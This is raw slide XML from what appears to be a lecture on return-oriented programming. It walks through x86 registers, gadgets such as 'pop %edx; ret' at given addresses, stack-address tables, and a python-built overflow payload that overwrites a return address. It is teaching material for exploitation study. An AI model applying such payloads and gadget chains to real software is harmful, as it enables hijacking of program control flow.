              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91b:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This gadget will take whatever is on the top of the stack and put it in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How does this help us?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104907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mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1a</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e9</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06</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08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edcb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</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175</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98466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176</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff64c</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0xbffff688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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e61</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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>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55547" y="33304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
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1026899"/>
            <a:ext cx="2831284" cy="373308"/>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985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177</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff64c</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0xbffff688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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e66</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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>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65239" y="359330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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38629790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178</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110923" y="13825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0xbffff68c</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048e67</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65239" y="3895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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66585806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179</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121142" y="100891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0xbffff690</a:t>
                      </a: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3"/>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75071" y="51810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
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809074" y="5053162"/>
            <a:ext cx="6256324" cy="70776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806e91a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91b	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53926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8" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>x86 Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003529" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registers represent the local variables of the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are four 32-bit general purpose registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cx, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accumulator: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer to data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loop counter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I/O operations: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003531" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="302895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2" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3028950"/>
            <a:ext cx="9906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ah</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003533" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3028950"/>
            <a:ext cx="9144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al</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003534" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477001" y="2272784"/>
            <a:ext cx="505267"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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003535" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3644384"/>
            <a:ext cx="40267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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003536" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7600950" y="295513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7" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6667500" y="99060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8" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="480060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9" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800600"/>
            <a:ext cx="1905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41" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4044434"/>
            <a:ext cx="441146"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esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003542" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="5416034"/>
            <a:ext cx="33855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si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003543" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7524750" y="472678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44" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6591300" y="276225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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178585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2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352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352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352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035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035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035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035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035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0353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0353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0353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0354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0354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0354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0354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0035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31" grpId="0" animBg="1"/>
      <p:bldP spid="1003532" grpId="0" animBg="1"/>
      <p:bldP spid="1003533" grpId="0" animBg="1"/>
      <p:bldP spid="1003534" grpId="0"/>
      <p:bldP spid="1003535" grpId="0"/>
      <p:bldP spid="1003536" grpId="0" animBg="1"/>
      <p:bldP spid="1003537" grpId="0" animBg="1"/>
      <p:bldP spid="1003538" grpId="0" animBg="1"/>
      <p:bldP spid="1003539" grpId="0" animBg="1"/>
      <p:bldP spid="1003541" grpId="0"/>
      <p:bldP spid="1003542" grpId="0"/>
      <p:bldP spid="1003543" grpId="0" animBg="1"/>
      <p:bldP spid="1003544"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0xbffff700</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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2"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85d</a:t>
                      </a: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0xbffff656</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180</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121142" y="645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0xbffff68c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="260445" y="4336604"/>
          <a:ext cx="3696160" cy="2056355"/>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0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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0xbffff6890</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="411271">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0x0806e91b</a:t>
                      </a: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0xbffff688</a:t>
            </a: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0xbffff64c</a:t>
            </a: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0xbffff650</a:t>
            </a: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0xbffff656</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784903" y="545637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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4809074" y="5053162"/>
            <a:ext cx="6256324" cy="70776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806e91a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91b	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260445" y="4763613"/>
            <a:ext cx="3696160" cy="378658"/>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79672" y="647899"/>
            <a:ext cx="2831284" cy="365172"/>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509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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, a pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret gadget will put the next value on the stack into the %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need a gadget to get our data into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ret at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>0x80bb6d6 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
